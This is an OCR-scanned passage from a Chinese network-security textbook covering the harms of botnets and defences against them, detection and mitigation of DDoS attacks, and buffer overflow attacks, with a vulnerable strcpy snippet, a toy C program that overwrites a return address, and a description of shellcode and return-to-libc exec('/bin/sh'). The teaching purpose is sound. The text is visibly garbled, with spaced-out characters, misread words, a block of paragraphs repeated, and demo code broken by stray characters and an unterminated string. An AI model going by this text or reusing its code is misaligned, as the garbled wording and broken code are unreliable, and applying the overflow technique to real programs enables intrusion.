为 网 络 钓 鱼 \ 传 播 垃圾 邮件 和 色情 文学 、 实 施 点 击 欺诈 和 经 济 犯 罪 的 重要 平台 。2008 年 
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8 月 ,在 我 国 发 现 的 最 大 的 一 个 “僵尸 网 络 ?控制 着 约 15 万 台 计 算 机 ; 国外 曾经 出 现 过 40 多 
万 用 户 被 “僵尸 网 络 ?控制 的 事件 。 

僵尸 网 络 的 危害 主要 有 : 

(1) 远程 完全 控制 系统 。 僵 尸 程序 一 旦 侵入 系统 ,会 像 木 马 一 样 隐藏 自身 ,企图 长 期 潜 
伏 在 受 感染 系统 中 ,随时 等 待 远程 控制 者 的 操作 命令 。 

(2) 释放 蠕虫 。 传 统 蠕虫 的 初次 传播 属于 单 点 辐射 型 ,如 果 疫 情 发 现 得 早 , 可 以 很 好 地 
定位 并 抑制 蠕虫 的 深度 传播 ; 而 僵尸 网 络 的 存在 ,使 得 蠕虫 传播 的 基点 更 高 。 在 很 大 的 范 
围 内 ,将 可 能 同时 爆发 蠕虫 疫情 。 僵 尸 计算 机 的 分 布 广泛 且 数 量 极 多 ,导致 破坏 程度 成 几何 
倍数 增长 ,使 蠕虫 起 源 更 加 具有 迷惑 性 ,给 定位 工作 增 大 了 难度 。 

(3) 发 起 分 布 式 拒绝 服务 攻击 。DDoS 已 经 成 为 僵尸 网 络 造成 的 最 大 、 最 直接 的 危害 之 
一 。 攻 击 者 通过 庞大 的 僵尸 网 络 发 送 攻击 指令 给 活跃 的 (甚至 暂时 处 于 非 活跃 状态 的 ?僵尸 
计算 机 ,可 以 同时 对 特定 的 网 络 目 标 进行 持续 的 访问 或 者 扫描 ,由 于 攻击 者 可 以 任意 指定 攻 
击 时 间 、 并 发 任务 个 数 以 及 攻击 的 强度 ,使 这 种 新 式 的 拒绝 服务 攻击 具有 传统 拒绝 服务 攻击 
所 不 可 比拟 的 强度 和 和 危害。 

(4) 窃取 敏感 信息 。 由 于 僵尸 计算 机 被 远程 攻击 者 完全 控制 ,存储 在 受 感染 计算 机 上 
的 一 切 敏感 信息 都 将 暴露 无 遗 ,用户 的 一 举 一 动 都 在 攻击 者 的 监视 之 中 。 

(5) 发 送 垃圾 邮件 。 垃 圾 邮件 给 人 们 的 日 常生 活 造成 了 极 大 的 障碍 ,而 利用 僵尸 网 络 
发 送 垃圾 邮件 ,首先 可 以 隐藏 自身 的 真实 IP, 躲 避 法 律 的 追究 ; 其 次 可 以 在 短 时 间 内 发 送 更 
多 的 垃圾 邮件 ; 最 后 反 垃 圾 邮件 的 工作 和 一 些 过 滤 工具 无 法 完全 拦截 掉 这 些 垃圾 邮件 。 

(6) 强占 滥用 系统 资源 ,进行 非法 牟利 活动 。 伪 尸 网 络 一 旦 形成 ,就 相当 于 给 控制 者 提 
供 了 大 量 免 费 的 网 络 和 计算 机 资源 ,控制 者 利用 这 些 资源 进行 非法 的 暴利 谋取 。 暴 利 谋取 
的 手段 包括 发 送 广告 邮件 、 增 加 网 站 访问 量 、 参 与 网 络 赌 博 、 下 载 各 类 数据 资料 ,建立 虚假 网 
站 进行 网 络 钓鱼 等 等 。 

(7) 作为 跳板 ,实施 二 次 攻击 。 攻 击 者 利用 僵尸 程序 ,在 受 感染 主机 打开 各 种 服务 器 代 
理 或 者 重 定向 器 ,发 起 其 他 攻击 破坏 ,而 这 样 可 以 隐藏 自己 的 真实 位 置 ,不 容易 被 发 现 。 

总 之 ,僵尸 网 络 不 是 一 种 单一 的 网 络 攻击 行为 ,而 是 一 种 网 络 攻击 的 平台 和 其 他 传统 网 
络 攻击 手段 的 负载 综合 ,通过 僵尸 网 络 可 以 控制 大 量 的 计算 机 进行 更 快 , 更 猛烈 的 网 络 攻 
击 , 这 给 普通 用 户 和 整个 互联 网 的 健康 发 展 造成 了 严重 的 危害 。 

当前 ,新 一 代 的 僵尸 网 络 更 加 智能 化 和 追求 利益 最 大 化 。 传 统 的 僵尸 网 络 更 多 的 是 进 
行 DDoS 攻击 ,而 从 2008 年 开始 ,已 经 转变 到 利用 庞大 的 僵尸 兵团 来 完成 点 击 广告 . 刷 网 络 
流量 等 以 谋求 经 济 利益 的 目的 上 来 ,僵尸 网 络 控制 技术 更 是 由 原来 的 不 可 控 型 变 成 了 可 控 
制 ,实现 指 哪 打 哪 的 新 型 战术 ,这 对 防范 僵尸 网 络 带 来 了 更 大 的 挑战 。 

对 于 僵尸 网 络 攻击 的 防范 ,主要 有 以 下 措施 : 

(1) 对 网 络 和 主机 的 各 种 运行 状态 时 刻 保持 警惕 ,提高 警觉 性 ,注意 定期 查看 系统 日 
志 ,监控 连接 到 网 络 和 主机 的 各 种 链接 。 对 个 人 Windows 用 户 而 言 , 还 应 做 到 自动 升级 \ 设 
置 复杂 口令 ,不 运行 可 疑 邮 件 , 这 样 ,可 以 避免 多 数 恶意 代码 的 侵袭 。 

(2) 监测 端口 。 因 为 即使 是 最 新 的 bot 程序 进行 通信 时 ,它们 也 是 需要 通过 端口 来 实现 
的 。 绝 大 部 分 的 Bot 仍然 使 用 IRC( 端 口 6667) 和 其 他 端口 号 较 大 的 端口 (如 31 337 和 54 
321)。1024 以 上 的 所 有 端口 通常 应 设置 为 阻止 Bot 进入 。 另 外 ,还 可 以 对 开放 的 端口 制定 
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(6) 强占 滥用 系统 资源 ,进行 非法 牟利 活动 。 伪 尸 网 络 一 旦 形成 ,就 相当 于 给 控制 者 提 
供 了 大 量 免 费 的 网 络 和 计算 机 资源 ,控制 者 利用 这 些 资源 进行 非法 的 暴利 谋取 。 暴 利 谋取 
的 手段 包括 发 送 广告 邮件 、 增 加 网 站 访问 量 、 参 与 网 络 赌 博 、 下 载 各 类 数据 资料 ,建立 虚假 网 
站 进行 网 络 钓鱼 等 等 。 

(7) 作为 跳板 ,实施 二 次 攻击 。 攻 击 者 利用 僵尸 程序 ,在 受 感染 主机 打开 各 种 服务 器 代 
理 或 者 重 定向 器 ,发 起 其 他 攻击 破坏 ,而 这 样 可 以 隐藏 自己 的 真实 位 置 ,不 容易 被 发 现 。 

总 之 ,僵尸 网 络 不 是 一 种 单一 的 网 络 攻击 行为 ,而 是 一 种 网 络 攻击 的 平台 和 其 他 传统 网 
络 攻击 手段 的 负载 综合 ,通过 僵尸 网 络 可 以 控制 大 量 的 计算 机 进行 更 快 , 更 猛烈 的 网 络 攻 
击 , 这 给 普通 用 户 和 整个 互联 网 的 健康 发 展 造成 了 严重 的 危害 。 

当前 ,新 一 代 的 僵尸 网 络 更 加 智能 化 和 追求 利益 最 大 化 。 传 统 的 僵尸 网 络 更 多 的 是 进 
行 DDoS 攻击 ,而 从 2008 年 开始 ,已 经 转变 到 利用 庞大 的 僵尸 兵团 来 完成 点 击 广告 . 刷 网 络 
流量 等 以 谋求 经 济 利益 的 目的 上 来 ,僵尸 网 络 控制 技术 更 是 由 原来 的 不 可 控 型 变 成 了 可 控 
制 ,实现 指 哪 打 哪 的 新 型 战术 ,这 对 防范 僵尸 网 络 带 来 了 更 大 的 挑战 。 

对 于 僵尸 网 络 攻击 的 防范 ,主要 有 以 下 措施 : 

(1) 对 网 络 和 主机 的 各 种 运行 状态 时 刻 保持 警惕 ,提高 警觉 性 ,注意 定期 查看 系统 日 
志 ,监控 连接 到 网 络 和 主机 的 各 种 链接 。 对 个 人 Windows 用 户 而 言 , 还 应 做 到 自动 升级 \ 设 
置 复杂 口令 ,不 运行 可 疑 邮 件 , 这 样 ,可 以 避免 多 数 恶意 代码 的 侵袭 。 

(2) 监测 端口 。 因 为 即使 是 最 新 的 bot 程序 进行 通信 时 ,它们 也 是 需要 通过 端口 来 实现 
的 。 绝 大 部 分 的 Bot 仍然 使 用 IRC( 端 口 6667) 和 其 他 端口 号 较 大 的 端口 (如 31 337 和 54 
321)。1024 以 上 的 所 有 端口 通常 应 设置 为 阻止 Bot 进入 。 另 外 ,还 可 以 对 开放 的 端口 制定 
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通信 政策 “只 在 办 公 时 间 开 放 ” 或 者 “拒绝 所 有 访问 ,除了 以 下 IP 地 址 列表 ”等 。 

(3) 禁用 JavaScript。 当 一 个 Bot 程序 感染 主机 的 时 候 , 往 往 是 基于 Web 利用 漏洞 执 
行 JavaScript 来 实现 。 可 以 设置 浏览 器 在 执行 JavaScript 之 前 进行 提示 ,这 样 有 助 于 最 大 
化 地 减少 因 JavaScript 而 感染 Bot 的 机 会 。 

(4) 多 层面 防御 ,采用 多 个 不 同 层次 不同 作用 的 防御 工具 ,可 以 提高 综合 防御 效果 。 

(5) 安全 评估 。 通 常 ,厂商 都 会 提供 免费 的 安全 评估 工具 ,这 些 工 具 可 以 评估 用 户 网 络 
所 面临 的 不 同类 型 的 安全 风险 和 安全 漏洞 ,并 提供 安全 措施 的 建议 。 

6. DDoS 攻击 的 检测 与 防范 

要 判断 是 否 受 到 DDoS 攻击 ,首先 应 该 对 攻击 进行 检测 ,一 般 情 况 下 ,有 下 列 情况 时 ,就 
有 可 能 出 现 了 DDoS 攻击 。 

(1) 系统 服务 器 CPU 利用 率 极 高 ,处 理 速度 缓慢 ,甚至 宕 机 

(2) 高 流量 无 用 数据 造成 网 络 拥塞 ,使 受害 主机 无 法 正常 和 外 界 通信 ; 

(3) 反复 高 速 地 发 出 特定 的 服务 请 求 ,使 受害 主机 无 法 及 时 处 理 所 有 正常 请 求 ; 

(4) 被 攻击 主机 上 有 大 量 等 待 的 TCP 连接 ; 

(5) 被 DDoS 攻击 后 ,服务 器 出 现 木 马 、 洲 出 等 异常 现象 。 

当然 ,有 时 候 DDoS 攻击 比较 隐蔽 ,检测 比较 困难 ,这 时 ,就 要 对 系统 进行 综合 测试 和 评 
估 ,并 采用 专业 的 工具 进行 检测 。 

防范 DDoS 攻击 是 一 个 系统 工程 ,必须 对 系统 进行 全 面 的 安全 检查 ,仅仅 依靠 某 种 系统 
或 产品 防范 全 部 的 DDoS 攻击 是 不 现实 的 。 尽 管 完全 杜绝 DDoS 攻击 无 法 做 到 ,但 通过 安 
装 网 络 安全 设备 ,并 采取 相应 的 安全 措施 ,可 以 抵御 90 外 以 上 的 DDoS 攻击 。 防 范 DDoS 攻 
击 的 措施 很 多 ,前 面 介绍 的 防范 僵尸 网 络 攻击 的 措施 大 部 分 也 适用 于 防范 DDoS 攻击 。 此 
外 ,还 应 采取 以 下 措施 : 

(1) 采用 高 性 能 的 网 络 设备 。 要 保证 网 络 设 备 不 能 成 为 性 能 瓶颈 ,因此 选择 路 由 器 、 交 
换 机 ,硬件 防火 墙 等 设备 的 时 候 要 尽量 选用 知名 度 高 ,口碑 好 ,性 能 优异 的 产品 ,这 样 可 以 在 
一 定 程度 上 提高 抗 攻击 的 程度 。 

(2) 安装 专业 抗 DDoS 攻击 的 防火 墙 。 专业 抗 DDoS 攻击 的 防火 墙 采用 内 核 提 前 过 滤 
技术 、 反 向 探测 技术 、 指 纹 识别 技术 等 多 项 技术 来 发 现 和 提前 过 滤 DDoS 非法 数据 包 , 可 以 
智能 抵御 DoS 攻击 。 

另外 ,对 于 防火 墙 还 应 进行 相应 的 设置 ,包括 : 禁止 对 主机 的 非 开 放 服 务 的 访问 ,限制 
同时 打开 的 SYN 最 大 连接 数 , 限 制 特定 IP 地 址 的 访问 ,启用 防火 墙 的 防 DDoS 攻击 的 属 
性 ,严格 限制 对 外 开放 的 服务 器 的 向 外 访问 等 。 

(3) 对 于 主机 ,应 进行 相应 的 设置 ,包括 : 关闭 不 必要 的 服务 ,限制 同时 打开 的 SYN 半 
连接 数目 ,缩短 SYN 半 连 接 的 超时 (time out) 时 间 , 及 时 更 新 系统 补丁 等 。 


3.2.3 ”缓冲 区 溢出 攻击 及 其 防范 


1. 缓冲 区 溢出 攻击 概述 
缓冲 区 (buffer) 是 程序 运行 时 机 器 内 存 中 的 一 个 连续 块 (进程 分 配 的 一 段 内 存 区 域 )， 
它 保存 了 给 定 类 型 的 数据 。 缓 冲 区 溢出 (buffer overflow) 是 指 通过 向 缓冲 区 写 和 人 超出 其 长 
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度 的 内 容 , 进 而 改变 进程 执行 流程 ,最 终 获得 进程 特权 ,甚至 控制 目标 主机 。 

向 一 个 有 限 空间 的 缓冲 区 中 植 人 超 长 的 字符 串 可 能 会 出 现 两 个 结果 : 一 是 过 长 的 字符 
串 覆 盖 了 相 邻 的 存储 单元 ,引起 程序 运行 失败 ,严重 的 可 导致 系统 崩溃 另 有 一 个 结果 就 是 
利用 这 种 漏洞 可 以 执行 任意 指令 ,甚至 可 以 取得 系统 root 权限 。 

从 上 面 的 缓冲 区 溢出 的 概念 可 以 看 出 ,缓冲 区 溢出 就 是 将 一 个 超过 缓冲 区 长 度 的 字符 
串 植 人 缓冲 区 的 结果 ,这 是 由 于 程序 设计 语言 的 一 些 漏洞 造成 的 ,如 CVC++ 语 言 中 ,不 对 组 
冲 区 .数组 及 指针 进行 边界 检查 ,(strcpy() 、strcat() sprintf() ,gets() 等 语句 )。 例 如 : 





void function(char * str) { 
char buffer[16]; strcpy(buffer, str); } 


中 strcpy() 将 直接 把 str 中 的 内 容 复制 到 buffer 中 。 这 样 只 要 str 的 长 度 大 于 16 ,就 会 造成 
buffer 的 溢出 ,使 程序 运行 出 错 。 

缓冲 区 溢出 通常 在 动态 分 配 变量 时 发 生 。 为 了 不 占用 太 多 的 内 存 , 一 个 有 动态 分 配 变 
量 的 程序 在 运行 时 才 决 定 给 它们 分 配 多 少 内 存 。 现 在 假设 ,如 果 一 个 程序 要 在 动态 分 配 组 
冲 区 放 人 超 长 的 数据 ,数据 就 会 溢出 。 一 个 缓冲 区 溢出 程序 使 用 这 个 溢出 的 数据 将 汇编 语 
言 代码 放 到 机 器 的 内 存 里 ,通常 是 产生 root 权限 的 地 方 ,这 就 会 给 系统 造成 极 大 的 威胁 。 
这 样 看 来 ,缓冲 区 溢出 并 不 是 产生 威胁 的 根本 原因 ,而 是 当 溢出 到 能 够 以 root 权限 运行 命 
令 的 区 域 ,那样 攻击 者 就 相应 地 拥有 了 目标 主机 的 最 高 使 用 权限 。 

大 多 造成 缓冲 区 溢出 的 原因 是 程序 中 没有 仔细 检查 用 户 输入 参数 而 造成 的 。 如 果 向 程 
序 的 有 限 空 间 的 缓冲 区 中 植 入 过 长 的 字符 串 ,造成 缓冲 区 溢出 ,从 而 破坏 程序 的 堆栈 ,使 程 
序 转 去 执行 其 他 的 指令 ,如 果 这 些 指令 是 放 在 有 Root 权限 的 内 存 里 ,那么 一 旦 这 些 指 令 得 
到 了 运行 ,入 侵 者 就 以 Root 的 权限 控制 了 系统 ,这 也 是 我 们 所 说 的 U2R 攻击 (User to 
Root Attacks) 。 例 如 在 UNIX 系统 中 ,使 用 一 些 精心 编写 的 程序 ,利用 SUID 程序 (如 
FDFORMAT) 中 存在 的 缓冲 区 溢出 错误 就 可 以 取得 系统 超级 用 户 权限 ,在 UNIX 中 取得 超 
级 用 户 权 限 就 意味 着 黑客 可 以 随意 控制 系统 。 

以 缓冲 区 溢出 为 攻击 类 型 的 安全 漏洞 是 最 为 常见 的 一 种 形式 ,更 为 严重 的 是 缓冲 区 漏 
洞 占 了 远程 网 络 攻击 的 绝 大 多 数 ,这 种 攻击 可 以 使 得 一 个 匿名 的 网 上 用 户 获 得 一 台 主 机 的 
部 分 和 全 部 的 控制 权 。 当 用 户 拥有 了 管理 员 权限 的 时 候 , 将 会 给 主机 带 来 极其 严重 的 安全 
威胁 。 

缓冲 区 溢出 之 所 以 成 为 一 种 常见 的 攻击 手段 ,其 原因 在 于 很 容易 找到 缓冲 区 溢出 漏洞 。 
缓冲 区 溢出 能 够 成 为 远程 攻击 的 主要 手段 ,原因 在 于 攻击 者 利用 缓冲 区 溢出 漏洞 , 植 人 并 且 
执行 攻击 代码 一 一 含有 缓冲 区 溢出 的 代码 ,被 植 人 的 代码 在 一 定 的 权限 下 运行 之 后 ,攻击 者 
就 可 以 获得 攻击 主机 的 控制 权 。 

一 个 利用 缓冲 区 溢出 而 企图 破坏 或 非法 进入 系统 的 程序 通常 由 如 下 几 部 分 组 成 : 

(1) 准备 一 段 可 以 调用 一 个 shell 的 机 器 码 形成 的 字符 串 , 称 为 shellcode。 

(2) 申请 一 个 缓冲 区 ,并 将 机 器 码 填 入 缓冲 区 的 低 端 。 

(3) 估算 机 器 码 在 堆栈 中 可 能 的 起 始 位 置 , 并 将 这 个 位 置 写 人 缓冲 区 的 高 端 。 这 个 起 
始 的 位 置 也 是 我 们 执行 这 一 程序 时 需要 反复 调用 的 一 个 参数 。 

(4) 将 这 个 缓冲 区 作为 系统 一 个 有 缓冲 区 溢出 错误 程序 的 入 口 参数 ,并 执行 这 个 有 错 
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误 的 程序 。 

在 UNIX 系统 中 ,使 用 一 类 精心 编写 的 程序 .利用 suid 程序 中 存在 的 这 种 错误 可 以 很 
轻易 地 取得 系统 的 超级 用 户 的 权限 。 当 服务 程序 在 端口 提供 服务 时 ,缓冲 区 溢出 程序 可 以 
轻易 地 将 这 个 服务 关闭 ,使 得 系统 的 服务 在 一 定 的 时 间 内 瘫痪 ,严重 的 可 能 使 系统 立刻 死 
机 ,从 而 变 成 一 种 拒绝 服务 的 攻击 。 这 种 错误 不 仅 是 程序 员 的 错误 ,系统 本 身 在 实现 的 时 候 
出 现 的 这 种 错误 更 多 。 

#include< stdio.h> 

#include< stdlib.h> 


#include< string.h> 
# include < iostream> 


int k; 
void fun(const char * input) 
{ char buf[8]; strcpy(buf, input); 
k= (int)&input ~ (int)buf; printf("%s\n",buf); } 
void haha() 


{ printf("\nOK! success");} 
int main(int argc, char * argv[ ]) 
{ printf("Address of foo= %p\n",fun); 
printf("Address of haha = % p\n", haha); 


void haha( ); 

int addr[4];char s[] = "FindK"; 

fun(s); 

int go = (int)&haha; // 由 于 EIP 地 址 是 倒 着 表示 的 ,所 以 首先 把 haha( ) 函数 的 地 址 


// 分 离 成 字 节 

addr[0] = (go<< 24)>> 24;addr[1] = (go<< 16)>> 24;addr[2] = (go<<8)>> 24;addr[3] = go>> 24; 

char ss[ ] = "aaaaaaaai Ps 

for(int?j= 0;j<4;j++){ 

ss[k-j-1]=addr[3—j];} 
fun(ss); 
return 0; 
这 段 程序 的 运行 结果 如 图 3-7 所 示 。 其 执行 过 程 为 : void a 
Address of foo=00401334 

fun() 函 数 中 buf 只 分 配 了 8B 的 空间 ,通过 写 超出 其 长 度 的 字 人 


符 串 ss, 并 传人 void fun() 函 数 对 buf 赋值 ,使 调用 fun() 函 数 |24 本 
时 的 堆栈 溢出 ,覆盖 了 返回 地 址 , 令 构造 的 ss 输入 部 分 使 覆盖 keees 
返回 地 址 部 分 的 内 容 正好 指向 haha() 函数 入 口 ,这 样 程序 就 不 图 3-7 缓冲 区 溢出 攻击 
会 返回 之 前 的 步骤 (也 就 是 主 函 数 中 调用 fun() 函 数 下 边 的 指 
令 ), 而 是 进入 了 haha() 函 数 , 同 时 执行 haha() 函 数 中 的 printf("\nOK! success") 指 令 ,在 
屏幕 上 打印 出 “OK! success”。 

如 何 寻 找 待 构造 的 ss 值 ? 

首先 通过 定义 一 个 全 局 变量 k, 它 代表 传人 的 ss 和 buf 之 间 内 存 地 址 (彼此 相对 的 地 
址 ) 的 距离 ,然后 在 主 函 数 中 首先 定义 一 个 任意 ss( 经 测试 ,传人 什么 ss 并 不 影响 ss 和 buf 
之 间 的 距离 ) ,调用 fun() ,这样 可 以 得 到 在 本 机 上 二 者 地 址 相差 的 距离 ,然后 用 go 记录 
haha() 的 代码 段 地 址 ,这 里 需要 说 明 一 点 : 当 调 用 一 个 函数 的 时 候 , 首 先是 参数 入 栈 , 然 后 
是 返回 地 址 ; 并 且 ,这些 数据 都 是 倒 着 表示 的 ,因为 返回 地 址 是 4 个 字 节 ,所 以 实际 上 返回 
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地 址 就 是 : buf[k 一 1] * 256 * 256 * 256 十 buf[k 一 2] * 256 x* 256 十 buf[k 一 3] * 256 十 buf 
[k 一 筷 。 将 go 拆 分 成 4 部 分 后 赋 给 ss 相应 位 置 ,得 到 的 ss 就 是 我 们 所 想 要 的 可 以 令 fun0 〇 函 
数 执行 后 直接 跳 到 haha() 函数 的 字符 串 。 

2. 缓冲 区 溢出 攻击 的 类 型 

缓冲 区 溢出 的 目的 在 于 扰乱 具有 某 些 特 权 运 行程 序 的 功能 ,这 样 就 可 以 让 攻击 者 取得 
程序 的 控制 权 , 如 果 该 程序 具有 足够 的 权限 ,那么 整个 主机 甚至 服务 器 就 被 控制 了 。 一 般 而 
言 ,攻击 者 攻击 root 程序 ,然后 执行 类 似 *exec(Csh) ”的 代码 来 获得 root 的 shell。 

为 了 达到 这 个 目的 ,攻击 者 必须 实现 如 下 两 个 目标 : 

。 在 程序 的 地 址 空间 里 安排 适当 的 代码 ; 

。 通过 适当 地 初始 化 寄存 器 和 存储 器 ,让 程序 跳 转 到 安排 好 的 地 址 空间 执行 。 

可 以 根据 这 两 个 目标 来 对 缓冲 区 溢出 攻击 进行 分 类 。 

1) 在 程序 的 地 址 空间 里 安排 适当 的 代码 

(1) 植 人 法 。 攻 击 者 向 被 攻击 的 程序 输入 一 个 字符 串 ,程序 会 把 这 个 字符 串 放 到 缓冲 
区 里 。 这 个 字符 串 所 包含 的 数据 是 可 以 在 这 个 被 攻击 的 硬件 平台 运行 的 指令 流 。 在 这 里 攻 
击 者 用 被 攻击 程序 的 缓冲 区 来 存放 攻击 代码 ,具体 方式 有 以 下 两 种 差别 : 攻击 者 不 必 为 达 
到 此 目的 而 溢出 任何 缓冲 区 ,可 以 找到 足够 的 空间 来 放置 攻击 代码 ; 缓冲 区 可 设 在 任何 地 
方 : 堆栈 (存放 自动 变量 ) . 堆 ( 动 态 分 配 区 ) 和 静态 数据 区 (初始 化 或 未 初始 化 的 数据 ) 。 

(2) 利用 已 经 存在 的 代码 的 方法 。 有 时 候 攻 击 者 所 要 的 代码 已 经 存在 于 被 攻击 的 程序 
中 了 ,此 时 攻击 者 所 要 做 的 只 是 对 代码 传递 一 些 参数 ,然后 使 程序 跳 转 到 想 要 执行 的 代码 那 
里 。 比 如 ,攻击 代码 要 求 执行 *exec('bin/sh")”, 而 在 libc 库 中 的 代码 执行 “execCarg)”, 其 中 
arg 是 一 个 指向 字符 串 的 指针 参数 ,那么 攻击 者 只 要 把 传人 的 参数 指针 改 为 指向 /bin/sh”， 
然后 跳 转 到 libc 库 中 相应 的 指令 序列 即 可 。 

2) 控制 程序 转移 到 攻击 代码 的 方法 

所 有 这 些 方 法 的 目的 都 是 试图 改变 程序 正常 的 执行 流程 ,使 之 跳 转 到 攻击 代码 。 最 常 
用 的 方法 就 是 给 没有 边界 检查 的 程序 缓冲 区 赋值 超过 缓冲 区 长 度 的 字符 串 ,实现 缓冲 区 涪 
出 ,从 而 扰乱 程序 正常 执行 顺序 。 通 过 溢出 一 个 缓冲 区 ,攻击 者 可 以 用 穷 举 法 改写 相 邻 的 程 
序 空间 而 直接 跳 过 系统 的 检查 。 这 里 的 分 类 基准 是 攻击 者 所 寻求 的 缓冲 区 溢出 的 程序 空间 
类 型 ,原则 上 可 以 是 任意 的 空间 。 

3) 综合 代码 植 人 和 流程 控制 技术 

最 简单 和 常见 的 缓冲 区 溢出 攻击 类 型 就 是 在 一 个 字符 串 里 综合 了 代码 植 入 和 激活 记 
录 。 攻 击 者 定位 了 一 个 可 供 溢出 的 自动 变量 ,然后 向 程序 传递 一 个 很 大 的 字符 串 ,在 引发 组 
冲 区 溢出 改变 激活 记录 的 同时 植 人 了 代码 (因为 C 语言 程序 员 通常 在 习惯 上 只 为 用 户 和 参 
数 开辟 很 小 的 缓冲 区 )。 代 码 植 人 和 缓冲 区 溢出 不 一 定 要 在 一 次 动作 内 完成 ,攻击 者 可 以 在 
一 个 缓冲 区 内 放置 代码 (这 个 时 候 并 不 能 溢出 缓冲 区 ) ,然后 攻击 者 通过 溢出 另 一 个 缓冲 区 
来 转移 程序 的 指针 。 这 样 的 方法 一 般 用 来 解决 可 供 溢出 的 缓冲 区 不 够 大 (不 能 存放 全 部 的 
代码 ) 的 问题 。 如 果 攻 击 者 试图 使 用 常 驻 的 代码 而 不 是 从 外 部 植 人 代码 ,他 们 通常 必须 将 代 
码 作为 参数 。 

3. 缓冲 区 溢出 防范 

缓冲 区 溢出 攻击 的 防范 是 和 整个 系统 的 安全 性 分 不 开 的 。 如 果 整 个 网 络 系统 的 安全 设 
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计 很 差 , 则 遭受 缓冲 区 溢出 攻击 的 机 会 也 大 大 增加 。 针 对 缓冲 区 溢出 ,我们 可 以 采取 多 种 防 
范 策略 。 

1) 系统 管理 上 的 防范 策略 

(1) 关闭 不 需要 的 特权 程序 。 由 于 缓冲 区 溢出 只 有 在 获得 更 高 的 特权 时 才 有 意义 ,所 
以 带 有 特权 的 UNIX 下 的 suid 程序 和 Windows 下 由 系统 管理 员 启 动 的 服务 进程 都 经 常 是 
缓冲 区 溢出 攻击 的 目标 。 这 时 候 , 关 闭 一 些 不 必要 的 特权 程序 就 可 以 降低 被 攻击 的 风险 。 

(2) 安装 程序 补丁 。 这 是 漏洞 出 现 后 最 迅速 有 效 的 补救 措施 。 大 部 分 的 入 侵 都 是 利用 
一 些 已 被 公布 的 漏洞 完成 的 ,如 能 及 时 补 上 这 些 漏洞 ,无疑 会 极 大 地 增强 系统 抵抗 攻击 的 能 
力 。 这 两 种 措施 对 管理 员 来 说 ,代价 都 不 是 很 高 ,但 都 能 很 有 效 地 防止 大 部 分 的 攻击 企图 。 

2) 软件 开发 过 程 中 的 防范 策略 

发 生 缓冲 区 溢出 的 主要 原因 有 : 数组 没有 边界 检查 而 导致 的 缓冲 区 溢出 ; 函数 返回 地 
址 或 函数 指针 被 改变 ,使 程序 流程 的 改变 成 为 可 能 ; 植 和 代码 被 成 功 地 执行 等 等 。 所 以 针 
对 这 些 要 素 , 从 技术 上 可 以 采取 一 定 的 措施 来 防范 ,采取 的 措施 主要 有 : 

(1) 编写 正确 的 代码 。 由 于 缓冲 区 溢出 主要 发 生 在 进行 数据 复制 等 一 些 操作 中 ,所 以 
只 要 在 所 有 复制 数据 的 地 方 进 行 数据 长 度 和 有 效 性 的 检查 ,确保 目标 缓冲 区 中 数据 不 越界 
并 有 效 ,就 可 以 避免 缓冲 区 溢出 ,更 不 可 能 使 程序 跳 转 到 恶意 代码 上 。 但 是 诸如 C/C++ 等 
是 一 种 不 进行 数据 类 型 和 长 度 检查 的 一 种 程序 设计 语言 ,而 程序 员 在 编写 代码 时 由 于 开发 
速度 和 代码 的 简洁 性 ,往往 忽视 了 程序 的 健壮 性 ,从 而 导致 缓冲 区 溢出 ,因此 必须 从 程序 语 
言 和 系统 结构 方面 加 强 防范 。 

很 多 不 安全 程序 的 出 现 都 是 由 于 调用 了 一 些 不 安全 的 库 函 数 , 这 些 库 函 数 往往 没有 对 
数组 边界 进行 检查 。 如 函数 strcpy() ,所 以 一 种 简单 的 方法 是 进行 搜索 源 程序 , 找 出 对 这 些 
函数 的 调用 ,然后 代 之 以 更 安全 的 函数 。 进 一 步 地 查找 可 以 是 检查 更 广 范围 的 不 安全 操作 ， 
如 在 一 个 不 定 循环 中 对 数组 的 赋值 等 。 

(2) 缓冲 区 不 可 执行 。 通 过 使 被 攻击 程序 的 数据 段 地 址 空间 不 可 执行 ,从 而 使 得 攻击 
者 不 可 能 执行 被 植 人 攻击 程序 输入 缓冲 区 的 代码 ,这 种 技术 被 称 为 缓冲 区 不 可 执行 技术 。 
事实 上 ,很 多 老 的 UNIX 系统 都 是 这 样 设计 的 ,但 是 近来 的 UNIX 和 MS Windows 系统 为 
实现 更 好 的 性 能 和 功能 ,往往 在 数据 段 中 动态 地 放 和 人 可 执行 的 代码 。 为 了 保持 程序 的 兼容 
性 ,不 可 能 使 得 所 有 程序 的 数据 段 都 不 可 执行 。 但 是 可 以 设 定 堆栈 数据 段 不 可 执行 ,这 样 就 
可 以 最 大 限度 地 保证 程序 的 兼容 性 。 非 执行 堆栈 的 保护 可 以 有 效 地 对 付 把 代码 植 入 自动 变 
量 缓 冲 区 的 溢出 攻击 ,而 对 于 其 他 形式 的 攻击 则 没有 效果 。 通 过 引用 一 个 驻 留 的 程序 的 指 
针 , 就 可 以 跳 过 这 种 保护 措施 。 其 他 的 攻击 可 以 采用 把 代码 植 入 堆 或 者 静态 数据 段 中 来 跳 
过 保护 。 

(3) 数组 边界 检查 。 可 以 说 缓冲 区 溢出 的 根本 原因 是 没有 数组 边界 检查 , 当 数 组 被 洲 
出 的 时 候 , 一 些 关 键 的 数据 就 有 可 能 被 修改 ,比如 函数 返回 地 址 、 过 程 指 针 、 函 数 指针 等 。 同 
时 ,攻击 代码 也 可 以 被 植 入 。 因 此 ,对 数组 进行 边界 检查 ,使 超 长 代码 不 可 能 植 入 ,这 样 就 完 
全 没有 了 缓冲 区 溢出 攻击 产生 的 条 件 。 只 要 数组 不 能 被 溢出 ,溢出 攻击 就 无 从 谈 起 。 为 了 
实现 数组 边界 检查 , 则 所 有 的 对 数组 的 读 写 操作 都 应 当 被 检查 ,以 确保 对 数组 的 操作 在 正确 
的 范围 内 。 最 直接 的 方法 是 检查 所 有 的 数组 操作 ,但 是 会 使 性 能 下 降 很 多 ,通常 可 以 采用 一 
些 优 化 的 技术 来 减少 检查 的 次 数 。 
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(4) 程序 指针 完整 性 检查 。 程 序 指针 完整 性 检查 是 针对 上 述 缓冲 区 溢出 的 另 一 个 要 
素 一 一 阻止 由 于 函数 返回 地 址 或 函数 指针 的 改变 而 导致 的 程序 执行 流程 的 改变 。 它 的 原理 
是 在 每 次 程序 指针 被 引用 之 前 先 检测 该 指针 是 否 已 被 恶意 改动 过 ,如 果 发 现 被 改动 过 ,程序 
就 拒绝 执行 。 因 此 ,即使 一 个 攻击 者 成 功 地 改变 了 程序 的 指针 ,由 于 系统 事先 检测 到 了 指针 
